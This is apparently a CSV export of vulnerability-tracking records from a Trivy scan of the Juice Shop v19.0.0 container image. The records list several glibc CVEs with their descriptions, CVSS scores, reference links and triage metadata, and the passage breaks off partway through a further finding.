NEWLINE Calling gethostbyaddr or gethostbyaddr_r with a configured nsswitch.conf that specifies the library's DNS backend in the GNU C Library version 2.34 to version 2.43 could, with a crafted response from the configured DNS server, result in a violation of the DNS specification that causes 
the application to treat a non-answer section of the DNS response as a valid answer. NEWLINE ",False,,,False,,,,False,bkimminich/juice-shop:v19.0.0 (debian 12.11),,False,,False,False,,False,,6a8c886f848e8f812bfdf251c83781d3964e6ee043dce4a87f57c56073fc3e82,34,affected,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:04.818193+00:00,,,,,0,[],,,S2,False,,,,,,,,False,https://access.redhat.com/security/cve/CVE-2026-4437 NEWLINE https://nvd.nist.gov/vuln/detail/CVE-2026-4437 NEWLINE https://sourceware.org/bugzilla/show_bug.cgi?id=34014 NEWLINE https://www.cve.org/CVERecord?id=CVE-2026-4437 NEWLINE https://www.openwall.com/lists/oss-security/2026/03/23/2,Admin User (admin),1,,,False,,,,,,,Medium,,,90,90,2026-08-10,2026-08-10,,,,True,,Trivy Scan,3,0,CVE-2026-4437 Libc6 2.36-9+deb12u10,False,False,,2026-05-12 17:37:04.818145+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice Shop,,CVE-2026-4437,debian; os-pkgs,"Active, Verified", +,,True,0,[],libc6,2.36-9+deb12u10,2026-05-12 17:37:04.822846+00:00,CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N,4.0,,,20,2026-05-12,,,glibc: glibc: Invalid DNS hostname returned via gethostbyaddr functions NEWLINE **Target:** bkimminich/juice-shop:v19.0.0 (debian 12.11) NEWLINE **Type:** debian NEWLINE **Fixed version:** NEWLINE NEWLINE Calling gethostbyaddr or gethostbyaddr_r with a configured nsswitch.conf that specifies the library's DNS backend in the GNU C library version 2.34 to version 2.43 could result in an invalid DNS hostname being returned to the caller in violation of the DNS specification. 
NEWLINE ,False,,,False,,,,False,bkimminich/juice-shop:v19.0.0 (debian 12.11),,False,,False,False,,False,,6bb30d870cf3a5e63eeb52b76f48b159aaa0bf3168a174d0c1d88dd6634db80f,35,affected,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:04.822906+00:00,,,,,0,[],,,S2,False,,,,,,,,False,https://access.redhat.com/security/cve/CVE-2026-4438 NEWLINE https://nvd.nist.gov/vuln/detail/CVE-2026-4438 NEWLINE https://sourceware.org/bugzilla/show_bug.cgi?id=34015 NEWLINE https://www.cve.org/CVERecord?id=CVE-2026-4438 NEWLINE https://www.openwall.com/lists/oss-security/2026/03/23/2,Admin User (admin),1,,,False,,,,,,,Medium,,,90,90,2026-08-10,2026-08-10,,,,True,,Trivy Scan,3,0,CVE-2026-4438 Libc6 2.36-9+deb12u10,False,False,,2026-05-12 17:37:04.822856+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice Shop,,CVE-2026-4438,debian; os-pkgs,"Active, Verified", +,,True,0,[],libc6,2.36-9+deb12u10,2026-05-12 17:37:04.826751+00:00,CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:N/A:H,5.9,,,787,2026-05-12,,,"glibc: glibc: Out-of-bounds write via TSIG record processing NEWLINE **Target:** bkimminich/juice-shop:v19.0.0 (debian 12.11) NEWLINE **Type:** debian NEWLINE **Fixed version:** NEWLINE NEWLINE The deprecated functions ns_printrrf, ns_printrr and fp_nquery in the GNU C Library version 2.2 and newer fail to enforce the caller-supplied buffer length, and can result in an out-of-bounds write when printing TSIG records. 
NEWLINE ",False,,,False,,,,False,bkimminich/juice-shop:v19.0.0 (debian 12.11),,False,,False,False,,False,,720852fe6850e835d1fe0c4becc6119bfbc1279972dda972facde9b87a0c6d3c,36,affected,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:04.826807+00:00,,,,,0,[],,,S2,False,,,,,,,,False,https://access.redhat.com/security/cve/CVE-2026-5435 NEWLINE https://inbox.sourceware.org/libc-announce/7a655d55-276f-41fe-b550-feb3ebb2ce91@redhat.com/T/#u NEWLINE https://nvd.nist.gov/vuln/detail/CVE-2026-5435 NEWLINE https://sourceware.org/bugzilla/show_bug.cgi?id=34033 NEWLINE https://www.cve.org/CVERecord?id=CVE-2026-5435,Admin User (admin),1,,,False,,,,,,,Medium,,,90,90,2026-08-10,2026-08-10,,,,True,,Trivy Scan,3,0,CVE-2026-5435 Libc6 2.36-9+deb12u10,False,False,,2026-05-12 17:37:04.826760+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice Shop,,CVE-2026-5435,debian; os-pkgs,"Active, Verified", +,,True,0,[],libc6,2.36-9+deb12u10,2026-05-12 17:37:04.830666+00:00,CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:N/I:L/A:H,5.0,,,122,2026-05-12,,,glibc: glibc: Heap Buffer Overflow in `scanf` with `%mc` format specifier and large width NEWLINE **Target:** bkimminich/juice-shop:v19.0.0 (debian 12.11) NEWLINE **Type:** debian NEWLINE **Fixed version:** NEWLINE NEWLINE Calling the scanf family of functions with a %mc (malloc'd character match) in the GNU C Library version 2.7 to version 2.43 with a format width specifier with an explicit width greater than 1024 could result in a one byte heap buffer overflow. 
NEWLINE ,False,,,False,,,,False,bkimminich/juice-shop:v19.0.0 (debian 12.11),,False,,False,False,,False,,37eb7b9fbd0f9b50b1f0067b2d3046cece76d14c75a68378d3becd54cb182e17,37,affected,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:04.830724+00:00,,,,,0,[],,,S2,False,,,,,,,,False,https://access.redhat.com/security/cve/CVE-2026-5450 NEWLINE https://inbox.sourceware.org/libc-announce/b11f0003-6ec1-4bd6-b9de-9e38a4efeca3@redhat.com/T/#u NEWLINE https://nvd.nist.gov/vuln/detail/CVE-2026-5450 NEWLINE https://nvd.nist.gov/vuln/detail/CVE-2026-5450#range-21286997 NEWLINE https://sourceware.org/bugzilla/show_bug.cgi?id=CVE-2026-5450 NEWLINE https://www.cve.org/CVERecord?id=CVE-2026-5450,Admin User (admin),1,,,False,,,,,,,Medium,,,90,90,2026-08-10,2026-08-10,,,,True,,Trivy Scan,3,0,CVE-2026-5450 Libc6 2.36-9+deb12u10,False,False,,2026-05-12 17:37:04.830675+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice Shop,,CVE-2026-5450,debian; os-pkgs,"Active, Verified", +,,True,0,[],libc6,2.36-9+deb12u10,2026-05-12 17:37:04.834490+00:00,CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:L/I:N/A:H,5.0,,,127,2026-05-12,,,"glibc: glibc: Information disclosure or denial of service via ungetwc function with specific wide character encodings NEWLINE **Target:** bkimminich/juice-shop:v19.0.0 (debian 12.11) NEWLINE **Type:** debian NEWLINE **Fixed version:** NEWLINE NEWLINE Calling the ungetwc function on a FILE stream with wide characters encoded in a character set that has overlaps between its single byte and multi-byte character encodings, in the GNU C Library version 2.43 or earlier, may result in an attempt to read bytes before an allocated buffer, potentially resulting in unintentional disclosure of neighboring data in the heap, or a program crash. 
NEWLINE NEWLINE A bug in the wide character pushback implementation (_IO_wdefault_pbackfail in libio/wgenops.c) causes ungetwc() to operate on the regular character buffer (fp->_IO_read_ptr) instead of the actual wide-stream read pointer (fp->_wide_data->_IO_read_ptr). The program crash may happen in cases where fp->_IO_read_ptr is not initialized and hence points to NULL. The buffer under-read requires a special situation where the input character encoding is such that there are overlaps between single byte representations and multibyte representations in that encoding, resulting in spurious matches. The spurious match case is not possible in the standard Unicode character sets. NEWLINE ",False,,,False,,,,False,bkimminich/juice-shop:v19.0.0 (debian 12.11),,False,,False,False,,False,,410bde0ff2061433a358317ef3ca49647a06a1adca54645398bf89f979ce86b0,38,affected,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:04.834555+00:00,,,,,0,[],,,S2,False,,,,,,,,False,https://access.redhat.com/security/cve/CVE-2026-5928 NEWLINE https://nvd.nist.gov/vuln/detail/CVE-2026-5928 NEWLINE https://sourceware.org/bugzilla/show_bug.cgi?id=33998 NEWLINE https://www.cve.org/CVERecord?id=CVE-2026-5928,Admin User (admin),1,,,False,,,,,,,Medium,,,90,90,2026-08-10,2026-08-10,,,,True,,Trivy Scan,3,0,CVE-2026-5928 Libc6 2.36-9+deb12u10,False,False,,2026-05-12 17:37:04.834499+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice Shop,,CVE-2026-5928,debian; os-pkgs,"Active, Verified", +,,True,0,[],libc6,2.36-9+deb12u10,2026-05-12 17:37:04.838758+00:00,CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:H,6.5,,,126,2026-05-12,,,"glibc: glibc: Application crash or uninitialized memory read via crafted DNS response NEWLINE **Target:** bkimminich/juice-shop:v19.0.0 (debian 12.11) NEWLINE **Type:** debian NEWLINE **Fixed version:** NEWLINE NEWLINE The deprecated functions ns_printrrf, ns_printrr and fp_nquery in the GNU C Library version 2.2 and newer fail to validate the 
RDATA content against the RDATA length in a DNS response when processing LOC, CERT, TKEY or TSIG records, which may allow an attacker to craft a DNS response, causing a target application to crash or read uninitialized memory. NEWLINE NEWLINE These functions are for application debugging only and hence not in the path of code executed by the DNS resolver. Further, they have been deprecated since version 2.34 and should not be used by any new applications. Applications should consider porting away from these interfaces since they may be removed in future versions. NEWLINE ",False,,,False,,,,False,bkimminich/juice-shop:v19.0.0 (debian 12.11),,False,,False,False,,False,,0692a10100b2704de9fc8fd13c3c0dd6f0dcadf5db422b5d39ae9f1b33ded6e2,39,affected,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:04.838894+00:00,,,,,0,[],,,S2,False,,,,,,,,False,https://access.redhat.com/security/cve/CVE-2026-6238 NEWLINE https://inbox.sourceware.org/libc-announce/7a655d55-276f-41fe-b550-feb3ebb2ce91@redhat.com/T/#u NEWLINE https://nvd.nist.gov/vuln/detail/CVE-2026-6238 NEWLINE https://sourceware.org/bugzilla/show_bug.cgi?id=34069 NEWLINE https://www.cve.org/CVERecord?id=CVE-2026-6238,Admin User (admin),1,,,False,,,,,,,Medium,,,90,90,2026-08-10,2026-08-10,,,,True,,Trivy Scan,3,0,CVE-2026-6238 Libc6 2.36-9+deb12u10,False,False,,2026-05-12 17:37:04.838769+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice Shop,,CVE-2026-6238,debian; os-pkgs,"Active, Verified", +,,True,0,[],,,2026-05-12 17:37:04.580044+00:00,,,,,79,2026-05-12,,,"**Result message:** Cannot determine what 'subs' is and it is used with a '